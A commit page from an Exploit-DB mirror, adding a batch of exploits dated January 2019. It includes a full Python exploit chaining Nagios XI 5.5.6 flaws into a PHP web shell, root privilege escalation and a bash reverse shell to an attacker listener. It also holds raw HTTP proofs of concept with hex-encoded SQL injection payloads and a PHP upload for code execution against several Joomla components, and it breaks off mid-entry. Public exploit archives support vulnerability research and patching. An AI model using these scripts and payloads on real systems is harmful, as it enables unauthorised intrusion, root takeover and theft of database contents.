bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-01-24

Browse source 
12 changes to exploits/shellcodes

Microsoft Windows CONTACT - HTML Injection / Remote Code Execution
Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation
Joomla! Component vBizz 1.0.7 - SQL Injection
Joomla! Component vBizz 1.0.7 - Remote Code Execution
Joomla! Component vWishlist 1.0.1 - SQL Injection
Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection
Joomla! Component vReview 1.9.11 - SQL Injection
Joomla! Component vRestaurant 1.9.4 - SQL Injection
Joomla! Component VMap 1.9.6 - SQL Injection
Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection
Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection
Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection
This commit is contained in:
Offensive Security 2019-01-24 05:01:41 +00:00
parent 9e738d6dae
commit 9ef926e1a1
13 changed files with 965 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

256
exploits/linux/webapps/46221.py Executable file
View file

@ -0,0 +1,256 @@
# Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation
# Date: 2019-01-22
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.nagios.com/
# Product: Nagios XI
# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.6.tar.gz
# Version: From 2012r1.0 to 5.5.6
# Tested on:
# - CentOS Linux 7.5.1804 (Core) / Kernel 3.10.0 / This was a vendor-provided .OVA file
# - Nagios XI 2012r1.0, 5r1.0, and 5.5.6
# CVE: CVE-2018-15708, CVE-2018-15710
#
# See Also:
# https://www.tenable.com/security/research/tra-2018-37
# https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172
#
# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop a root reverse shell.
# You'll need your own Netcat listener
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer, threading, ssl
import requests, urllib
import sys, os, argparse
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
TIMEOUT = 5 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# handle sending a get request
def http_get_quiet(url):
try:
r = requests.get(url, timeout=TIMEOUT, verify=False)
except requests.exceptions.ReadTimeout:
err_and_exit("Request to '" + url + "' timed out.")
else:
return r
# 200?
def url_ok(url):
r = http_get_quiet(url)
return (r.status_code == 200)
# run a shell command using the PHP file we uploaded
def send_shell_cmd(path, cmd):
querystr = { 'cmd' : cmd }
# e.g. http://blah/exec.php?cmd=whoami
url = path + '?' + urllib.urlencode(querystr)
return http_get_quiet(url)
# delete some files locally and on the Nagios XI instance
def clean_up(remote, paths, exec_path=None):
if remote:
for path in paths:
send_shell_cmd(exec_path, 'rm ' + path)
print 'Removing remote file ' + path
else:
for path in paths:
os.remove(path)
print 'Removing local file ' + path
# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
def generate_self_signed_cert(cert_dir, cert_file, key_file):
"""Generate a SSL certificate.
If the cert_path and the key_path are present they will be overwritten.
"""
if not os.path.exists(cert_dir):
os.makedirs(cert_dir)
cert_path = os.path.join(cert_dir, cert_file)
key_path = os.path.join(cert_dir, key_file)
if os.path.exists(cert_path):
os.unlink(cert_path)
if os.path.exists(key_path):
os.unlink(key_path)
# create a key pair
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 1024)
# create a self-signed cert
cert = crypto.X509()
cert.get_subject().C = 'US'
cert.get_subject().ST = 'Lorem'
cert.get_subject().L = 'Ipsum'
cert.get_subject().O = 'Lorem'
cert.get_subject().OU = 'Ipsum'
cert.get_subject().CN = 'Unknown'
cert.set_serial_number(1000)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(key)
cert.sign(key, 'sha1')
with open(cert_path, 'wt') as fd:
fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(key_path, 'wt') as fd:
fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
return cert_path, key_path
# HTTP request handler
class MyHTTPD(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
self.end_headers()
self.wfile.write(str.encode(msg))
# Make the http listener operate on its own thread
class ThreadedWebHandler(object):
def __init__(self, host, port, keyfile, certfile):
self.server = SocketServer.TCPServer((host, port), MyHTTPD)
self.server.socket = ssl.wrap_socket(
self.server.socket,
keyfile=keyfile,
certfile=certfile,
server_side=True
)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
self.server_thread.start()
def stop(self):
self.server.shutdown()
self.server.server_close()
##### MAIN #####
desc = 'Nagios XI 2012r1.0 < 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()
# Nagios XI target settings
target = { 'ip' : args.t }
# listener settings
listener = {
'ip' : args.ip,
'port' : args.port,
'ncip' : args.ncip,
'ncport': args.ncport
}
# generate self-signed cert
cert_file = 'cert.crt'
key_file = 'key.key'
generate_self_signed_cert('./', cert_file, key_file)
# start threaded listener
# thanks http://brahmlower.io/threaded-http-server.html
server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
server.start()
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
# path to Nagios XI app
base_url = 'https://' + target['ip']
# ensure magpie_debug.php exists
magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
if not url_ok(magpie_url):
err_and_exit('magpie_debug.php not found.')
print '\nFound magpie_debug.php.\n'
exec_path = None # path to exec.php in URL
cleanup_paths = [] # local path on Nagios XI filesystem to clean up
# ( local fs path : url path )
paths = [
( '/usr/local/nagvis/share/', '/nagvis' ),
( '/var/www/html/nagiosql/', '/nagiosql' )
]
# inject argument to create exec.php
# try multiple directories if necessary. dir will be different based on nagios xi version
filename = 'exec.php'
for path in paths:
local_path = path[0] + filename # on fs
url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php
url = magpie_url + '?url=' + url
print 'magpie url = ' + url
r = http_get_quiet(url)
# ensure php file was created
exec_url = base_url + path[1] + '/' + filename # e.g. https://192.168.1.192/nagiosql/exec.php
if url_ok(exec_url):
exec_path = exec_url
cleanup_paths.append(local_path)
break
# otherwise, try the next path
if exec_path is None:
err_and_exit('Couldn\'t create PHP file.')
print '\n' + filename + ' written. Visit ' + exec_url + '\n'
# run a few commands to display status to user
print 'Gathering some basic info...'
cmds = [
('whoami', 'Current User'),
("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
]
for cmd in cmds:
r = send_shell_cmd(exec_url, cmd[0])
sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)
# candidates for privilege escalation
# depends on Nagios XI version
rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'
# tuple contains (shell command, cleanup path)
priv_esc_list = [
("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
]
# escalate privileges and launch the connect-back shell
timed_out = False
for priv_esc in priv_esc_list:
try:
querystr = { 'cmd' : priv_esc[0] }
url = exec_path + '?' + urllib.urlencode(querystr)
r = requests.get(url, timeout=TIMEOUT, verify=False)
print '\nTrying to escalate privs with url: ' + url
except requests.exceptions.ReadTimeout:
timed_out = True
if priv_esc[1] is not None:
cleanup_paths.append(priv_esc[1])
break
if timed_out:
print 'Check for a shell!!\n'
else:
print 'Not so sure it worked...\n'
server.stop()
# clean up files we created
clean_up(True, cleanup_paths, exec_path) # remote files
clean_up(False, [cert_file, key_file])

45
exploits/php/webapps/46223.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php
#
POST /[PATH]/index.php? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 726
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
profile_pic=&name=test&username=test&password=&user_role=11&email=test@test.test&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7&amount[]=0.00&payid[]=8&amount[]=0.00&payid[]=9%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&lastIncrement=7&option=com_vbizz&id=60&userid=60&task=apply&view=employee: undefined
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.6.36
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 500
Content-Length: 4278
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:10:53 GMT
X-Varnish: 561075451
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

177
exploits/php/webapps/46224.txt Normal file
View file

@ -0,0 +1,177 @@
# Exploit Title: Joomla! Component vBizz 1.0.7 - Remote Code Execution
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_vbizz&view=employee
#
POST /[PATH]/index.php?option=com_vbizz&view=employee HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 3876
Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------21301381330395: undefined
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------21301381330395
Content-Disposition: form-data; name="name"
test
-----------------------------21301381330395
Content-Disposition: form-data; name="username"
test
-----------------------------21301381330395
Content-Disposition: form-data; name="password"
-----------------------------21301381330395
Content-Disposition: form-data; name="user_role"
11
-----------------------------21301381330395
Content-Disposition: form-data; name="email"
test@test.test
-----------------------------21301381330395
Content-Disposition: form-data; name="empid"
1
-----------------------------21301381330395
Content-Disposition: form-data; name="department"
5
-----------------------------21301381330395
Content-Disposition: form-data; name="designation"
6
-----------------------------21301381330395
Content-Disposition: form-data; name="phone"
-----------------------------21301381330395
Content-Disposition: form-data; name="gender"
1
-----------------------------21301381330395
Content-Disposition: form-data; name="blood_group"
A+
-----------------------------21301381330395
Content-Disposition: form-data; name="dob"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="present_address"
-----------------------------21301381330395
Content-Disposition: form-data; name="permanent_address"
-----------------------------21301381330395
Content-Disposition: form-data; name="joining_date"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="work_type"
permanent
-----------------------------21301381330395
Content-Disposition: form-data; name="payment_type"
bank
-----------------------------21301381330395
Content-Disposition: form-data; name="pan"
-----------------------------21301381330395
Content-Disposition: form-data; name="pf_ac"
0
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_ac"
0
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_name"
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_branch"
-----------------------------21301381330395
Content-Disposition: form-data; name="ifsc"
-----------------------------21301381330395
Content-Disposition: form-data; name="leaving_date"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
111.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
7
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
0.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
8
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
0.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
9
-----------------------------21301381330395
Content-Disposition: form-data; name="lastIncrement"
7
-----------------------------21301381330395
Content-Disposition: form-data; name="option"
com_vbizz
-----------------------------21301381330395
Content-Disposition: form-data; name="id"
60
-----------------------------21301381330395
Content-Disposition: form-data; name="userid"
60
-----------------------------21301381330395
Content-Disposition: form-data; name="task"
apply
-----------------------------21301381330395
Content-Disposition: form-data; name="view"
employee
-----------------------------21301381330395--
HTTP/1.1 303 See other
X-Powered-By: PHP/5.6.36
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Last-Modified: Tue, 22 Jan 2019 21:21:40 GMT
Content-Type: text/html; charset=utf-8
Server: - Web acceleration by http://target/
X-Cacheable: YES
Content-Length: 28854
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:21:40 GMT
X-Varnish: 561081442
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: MISS
GET /components/com_vbizz/uploads/profile_pics/1548192100phpinfo.php HTTP/1.1
Host: vbizz-for-joomla.wdmtech.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.36
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: YES
Content-Length: 110286
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:21:44 GMT
X-Varnish: 561081464
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: MISS

72
exploits/php/webapps/46225.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: Joomla! Component vWishlist 1.0.1 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/vwishlist/
# Version: 1.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]//
#
POST /[PATH]/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58: undefined
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: True
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# POC:
# 2)
# http://localhost/[PATH]//
#
POST /[PATH]/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
option=com_vwishlist&task=wishlist&wishval=1&userid=711%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48: undefined
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: True
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

42
exploits/php/webapps/46226.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Joomla! Component vAccount 2.0.2 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/financial/cost-calculators/vaccount/
# Version: 2.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/vaccount-dashboard/expense?vid=[SQL]
#
GET /[PATH]/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.6.36
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 500
Content-Length: 4216
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:33:56 GMT
X-Varnish: 561086750
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

70
exploits/php/webapps/46227.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: Joomla! Component vReview 1.9.11 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/
# Version: 1.9.11
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_vreview&task=editReview
#
POST /[PATH]/index.php?option=com_vreview&task=editReview HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Date: Tue, 22 Jan 2019 19:41:46 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# POC:
# 2)
# http://localhost/[PATH]/index.php?option=com_vreview&task=displayRecords
#
POST /[PATH]/index.php?option=com_vreview&task=displayReply HTTP/1.1
POST /[PATH]/index.php?option=com_vreview&task=displayRecords HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 424
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
profileid=%39%39%39%39%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2d%2d%20%2d: undefined
HTTP/1.1 500....
Date: Tue, 22 Jan 2019 19:33:39 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

47
exploits/php/webapps/46228.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Joomla! Component vRestaurant 1.9.4 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/vrestaurant/
# Version: 1.9.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/menu-listing-layout/menuitems
#
%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%4e%52%3a%3d%30%29%2c%28%53%45%4c%45%43%54%28%30%29%46%52%4f%4d%28%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%29%57%48%45%52%45%28%54%41%42%4c%45%5f%53%43%48%45%4d%41%21%3d%30%78%36%39%36%65%36%36%36%66%37%32%36%64%36%31%37%34%36%39%36%66%36%65%35%66%37%33%36%33%36%38%36%35%36%64%36%31%29%41%4e%44%28%30%78%30%30%29%49%4e%28%40%78%3a%3d%43%4f%4e%43%41%54%28%40%78%2c%4c%50%41%44%28%40%4e%52%3a%3d%40%4e%52%25%32%62%31%2c%34%2c%30%78%33%30%29%2c%30%78%33%61%32%30%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2d%2d%20%2d
# keysearch=[SQL]
# categories[]=[SQL]
# min=[SQL]
# max=[SQL]
POST /[PATH]/menu-listing-layout/menuitems HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
csmodid=236&Itemid=303&keysearch=' union select (SELECT(@x)FROM(SELECT(@x: =0x00),(@NR
HTTP/1.1 500 You have an error in your SQL .....#__associations<br>0007: #__banner_clients<br>0008: #__banner_tracks<br>0009: #__banners<br>0010:X-Powered-By: PHP/5.6.16
Date: Tue, 22 Jan 2019 19:04:29 GMT
Server: Apache
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

38
exploits/php/webapps/46229.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Joomla! Component VMap 1.9.6 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/vmap/
# Version: 1.9.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=[SQL]&mapid=1
#
